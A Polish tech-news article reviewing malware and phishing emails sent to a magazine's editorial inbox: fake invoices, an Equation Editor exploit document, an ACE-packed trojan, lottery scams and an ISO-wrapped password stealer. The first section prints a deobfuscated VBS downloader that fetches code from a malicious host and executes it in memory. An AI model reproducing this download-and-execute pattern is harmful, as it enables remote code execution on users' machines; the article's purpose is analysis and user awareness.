Przegląd wirusów z redakcyjnej skrzynki pocztowej

Strona główna Aktualności
Przegląd wirusów z redakcyjnej skrzynki pocztowej (depositphotos)
Przegląd wirusów z redakcyjnej skrzynki pocztowej (depositphotos)

O autorze

Wydaje się, że z biegiem lat złośliwe oprogramowanie ewoluuje. Że dzisiejsze antywirusy są niezwykle złożonymi programami, które muszą naprawdę ciężko pracować, by z akceptowalną skutecznością łapać coraz bardziej przebiegłe szkodniki. Owszem, złożoność malware’u rośnie. Ale jednocześnie wciąż w obiegu znajdują się wirusy bazujące na zupełnej naiwności i ślepocie użytkowników. W tej materii jest dziś niemal tak samo, jak przed wiekami: jedyne, co się zmieniło, to spadek popularności i zniknięcie programu Outlook Express. Pytanie „jakim cudem ktokolwiek się na to nabiera?” było aktualne w roku 2000 i można je z powodzeniem zadawać dalej, osiemnaście lat później. Zapraszamy na przegląd wirusów z redakcyjnej poczty.

Faktury, Rachunki, Płatności

Załączniki z wirusami najczęściej przychodzą z mailem udającym wezwanie do zapłaty faktury. Zazwyczaj jest to mail o zupełnie ogólnej treści, niewskazującej ani na przedmiot rozliczenia, ani na wystawcę dokumentu. Źródło wiadomości wskazuje na nieznanego nadawcę ze sfałszowanej domeny:

Received: from eeeeweuuuuuzzi (unknown [185.141.25.87]) by fonon.nazwa.pl (Postfix)
<br>
for <redakcja@dobreprogramy.pl>; Tue,6 Nov 2018 09:51:37 +0100 *CET)

Pocztę przeskanował silnik ClamAV i (bez szoku) nie znalazł wirusa. W załączniku znajduje się mikroskopijny plik RAR o nazwie „faktura”, zawierający w środku naiwnie zaciemniony plik VBS, czyli skrypt w języku Visual Basic. Po sprostowaniu jego zawartości i usunięciu śmieci, w praktyce sprowadza się on do następujących rozkazów:


On Error Resume Next
Dim xD
Set xD = CreateObject("Microsoft.XMLHTTP")
xD.Open "GET", "http://<złośliwe IP>/index.php?idr=621165&&opt=200001&see", False
Execute xD.Send
Execute( xD.responseText )

xD.Open "GET", "http://<złośliwe DN>.site/index.php?idr=621165&&opt=200001&see", False
Execute xD.Send
Execute( xD.responseText )

Jak to działa? Silnik VBS tworzy nowy obiekt-żądanie XML http Request, którym odbiera strumień „response text”. W ramach odpowiedzi otrzymuje kod, który bez zapisania do pliku od razu wykonuje. Nie wiadomo już, co się czaiło w owej odpowiedzi, ponieważ serwery użyte do ataku zostały już „zdjęte” i nie odpowiadają żadnym kodem. Rzeczywisty payload owego wirusa jest bezplikowy: polecenie jest wykonywane bezpośrednio ze strumienia, więc na dysku nie pojawia się żaden plik, który mógłby zostać złapany przez antywirusa. Sam skrypt jest zaciemniony, więc na Virus Total w dniu odbioru wykrywało go 6 skanerów. Szansa na sukces kryje się w tym, że system Windows od ponad dwudziestu lat domyślnie uruchamia, a nie wyświetla, pliki BAT, CMD, JS i VBS. To relikt z przejściowego okresu w Microsofcie, gdy myślano przede wszystkim nad dodaniem obsługi internetu i automatyzacji do każdego produktu, o bezpieczeństwie myśląc później. W Redmond już od dawna nie robi się takiego oprogramowania. Skrypty PowerShell domyślnie otwierają się w Notatniku. A Visual Basic, niezmiennie, jest domyślnie wykonywalny.

Pozostaje pytanie – kto o zdrowych zmysłach otworzy fakturę za nieznany obiekt od nieznanego nadawcy, zdekompresuje archiwum RAR, a następnie dwukrotnie kliknie na ikonę skryptu VBS o losowej nazwie?

Nowsze „faktury” były zaciemnione w podobnym stylu, ale były wadliwe – każda kolejna wersja bardziej. Najpierw był to kod bezsensowny, z prostym błędem, a potem już w ogóle śmieci, niepoprawne składniowo. Wskazuje to, że zaciemniacz był chałupniczej roboty. Adresy URL oraz komentarze wskazywały na to, że tym razem nie chodzi już o uruchomienie bezplikowego wirusa, a przekierowanie na stronę-dostawcę strumieni z kamerek erotycznych. Co ciekawe, Windows Defender był innego zdania: w skrypcie widział kontroler dla trojana. Virus Total wyjaśnia sprawę: skrypt to generyczny „pobieracz” – być może był używany do dostarczania trojanów. Tym razem nie był w stanie.

Złowrogi Edytor Równań z Microsoft Office

Odrobinkę ciekawszym motywem, niż wirus do „samodzielnego składania” w VBS, był mail z Działu Sprzedaży pewnej elektrowni w Królestwie Arabii Saudyjskiej. Pan imieniem Mohammad, a w praktyce jakiś oszust wykorzystujący osłabiony serwer Swift Way, oferował nam dokument DOC z detalami dotyczącymi nowego kodu zamówienia. W środku dokumentu nie znajdowały się jednak żadne cenne informacje dotyczące zakupionego przez nas saudyjskiego prądu, na który tak niecierpliwie czekamy. Zamiast tego, można było znaleźć osadzony komponent Edytora Równań, wykorzystujący podatność CVE/2017-11882 dzięki której możliwe jest wykonanie nieprawidłowego komponentu jako kod na prawach użytkownika. Podatność tę załatano (poprzez usunięcie z pakietu Office obsługi Equation 3.0, ponieważ zapewne zagubiono do niego kod źródłowy i nie dało się stworzyć łatki) rok temu, a systemowy Defender na wszelki wypadek został zaopatrzony w definicję dla tego rodzaju zagrożenia. Dziurę załatano wtedy nawet w pakiecie Office 2007, już wtedy nieobsługiwanym. Aby więc faktycznie wykorzystać dziś tę podatność, konieczne jest posiadanie systemu starszego, niż Windows 8 oraz pakietu Office 2003. Jakże częsta dziś konfiguracja.

Co próbował zrobić wspomniany dokument? Pobrać plik EXE z serwera wołanego po adresie IP. Serwer nie odpowiadał. Nudy. Jedynym ciekawym detalem był fakt, że poprzedni odbiorca w łańcuchu otrzymał żądanie potwierdzenia odbioru do użytkownika „trhsentosa” poczty Yahoo.

Puzzle z tysiąca elementów, czyli wirusy w ACE

Skanery antywirusowe istotnie stają się coraz bardziej przenikliwe. W połączeniu z politykami bezpieczeństwa, wycinającymi obsługę skryptów oraz aktualizacjami, chroniącymi przed dziurami w zabezpieczeniach, przesłanie zaciemnionego kodu wymaga coraz bardziej wyrafinowanych metod. Czasem da się w tej kwestii mocno przesadzić. W ten sposób otrzymaliśmy wirusa skompresowanego algorytmem ACE.

To w ogóle było bardzo ambitne przedsięwzięcie. Mail został wysłany ze Szpitala Położniczego Leleka na Ukrainie, z użyciem sfałszowanej domeny z Grecji, a w treści informował o przesłaniu faktury za zamówione agregaty grzewcze dla ogrzewania podłogowego (zapewne zamówiła je @xyrcon, która kończy remont mieszkania). Był problem w ogóle dostać się do tego wirusa. Program 7-Zip nie zawiera dekompresora formatu ACE. Z pomocą przyszedł podsystem dla aplikacji linuksowych w Windows 10, ponieważ znajdował się w nim Python. Narzędzie acefile-unace pozwoliło rozpakować ten plik – po czym natychmiast złapał go Defender.

Windows Defender okazuje się bardzo ciekawie współpracować z procesami WSL. Przenoszony do kwarantanny plik EXE był przez chwilę dostępny do przeglądania - dzięki temu udało się wyciągnąć z niego stub MZ o rzadszej treści, niż zwyczajowa:„This program must be run under Win32”. Gdy kwarantanna zaczęła działać, coraz mniejsze części pliku były dostępne do wyświetlenia, aż z końcu możliwe było przeglądanie wyłącznie zer. Z kolei na pulpicie Windows, plik był niedostępny od samego początku. Trudno tu o jakiekolwiek wnioski, ale nasuwają się podejrzenia, że WSL będzie wkrótce wykorzystywany jako wektor ataku.

Ponieważ wirus w ACE stawiał przed użytkownikiem wysokie wymagania, on sam również był wymagający. Program wykrywał obecność w maszynie wirtualnej, a gdy udało się go oszukać, podpinał się metodą LOLBin do systemowych aplikacji, aby pracować z ramach podpisanego programu. Ponownie próbował pobierać swój „ciąg dalszy”, również z serwerów wołanych po IP. Bezskutecznie – owe serwery również milczą.

Odwrotna Loteria

Czasem uśmiecha się do nas szczęście. Po wirusach, które trzeba rozpakować pod Linuksem przyszedł mail informujący nas o (najwyraźniej kolektywnym?) zwycięstwie na loterii. Nagłówek wskazywał, że loterię organizuje Uniwersytet Południowej Karoliny. Nie wskazywało na to nic innego, ponieważ temat oraz treść wiadomości były puste. Jedyną treścią był załącznik w postaci pliku PDF. Nie, nie był to dokument z exploitem na Adobe Readera. Było to coś o wiele piękniejszego:

Od czego tu w ogóle zacząć? Czy od krzywych, nieaktualnych, zaszumionych logotypów umieszczonych poza obszarem wydruku? Czy może od łamanej angielszczyzny? A może od tego, że poza wygraniem pięciuset tysięcy dolarów, otrzymujemy telefon Apple iPhone X Max (?) firmy GMail, która stworzyła go we współpracy z korporacją Microsoft? Trzeba będzie odłożyć te rozważania na później, ponieważ czym prędzej należy wypełnić formularz z numerem i kodem karty kredytowej, a następnie wysłać go na adres e-mail w domenie Outlook.com. Adres, który według nobliwej bazy Scam Database jest wykorzystywany do oszustw tak często, że zdobył sobie już uznanie i renomę. Coś wspaniałego. Aż kusi odpisać.

Swoją drogą, jeżeli już jesteśmy przy dziwnych dokumentach, takie cudo (wreszcie po niemiecku!) przyszło z Indii:

Doprawdy, NATIONAL SECURITY AGENTUREN brzmi dumnie. Zwłaszcza w połączeniu z bannerem Międzynarodowego Funduszu Walutowego. Wśród otrzymanych prób wyłudzeń numeru karty, powyższe podejście zasługuje na mocną ocenę 😂 / 10.

Sztuki połączone

Zdarzają się także osobliwości łączące wszystkie powyższe techniki. Jak e-mail z dedykowanej domeny, niemal bez nagłówka, zawierający fakturę w formacie… ISO. Oczywiście, nie oznacza to, że należy sobie zadać jeszcze więcej wysiłku, niż w przypadku ręcznej dekompresji pliku ACE i wypalić wirusa na płytce. Zapewne chodzi tu o to, że format ISO jest natywnie obsługiwany przez systemy Windows 8 w górę i możliwe jest podpięcie ich jako dysku przez dwukrotne kliknięcie. Wewnątrz pliku ISO znajduje się dokument Worda, którego jedyną treścią jest żywcem osadzony obiekt w postaci pliku EXE. To ci dopiero enkapsulacja! Tenże plik to program Windows o rozszerzeniu COM i długości równo 500 kilobajtów. Przedstawia się jako zupełne dziwadło:


    {
      VALUE "Comments",          " INstanTbIRd "
      VALUE "CompanyName",       " KAspErSkY Lab ZAO   "
      VALUE "FileDescription",   " AUdaCITy Team "
      VALUE "LegalCopyright",    " FAcEboOK INc. "
      VALUE "LegalTrademarks",   " FInArEa S.A. SWitzerland "
      VALUE "ProductName",       " CoDe LAborATories, Inc. "
      VALUE "FileVersion",       "1.00"
      VALUE "ProductVersion",    "1.00"
      VALUE "InternalName",      "Folkereprsentant"
      VALUE "OriginalFilename",  "Folkereprsentant.exe"
    }

Defender ubija go natychmiast. To ciekawe, ponieważ ten sam Defender na stronie Virus Total twierdzi, że plik jest w porządku i wykrywają go tylko cztery skanery. Tymczasem plik w środku szuka na dysku katalogów Firefox\*\cache i Chrome\*\cache. Potem nie radzi sobie zbyt dobrze z życiem i nie robi nic, ale zaklasyfikowanie go przez Defendera jako program go kradzieży haseł jest trafne.

W dalszym ciągu jednak, nabranie się na tak ordynarny przekręt wymaga co najmniej nieuwagi, a w praktyce – jednak pewnej ciemnoty. Jest wszelako pewien pozytywny morał z tej historii: jeżeli wirusy dalej polegają na e-mailach z fakturami, to znaczy, że do dystopijnej przyszłości pełnej niewykrywalnych wirusów jeszcze daleka droga.

© dobreprogramy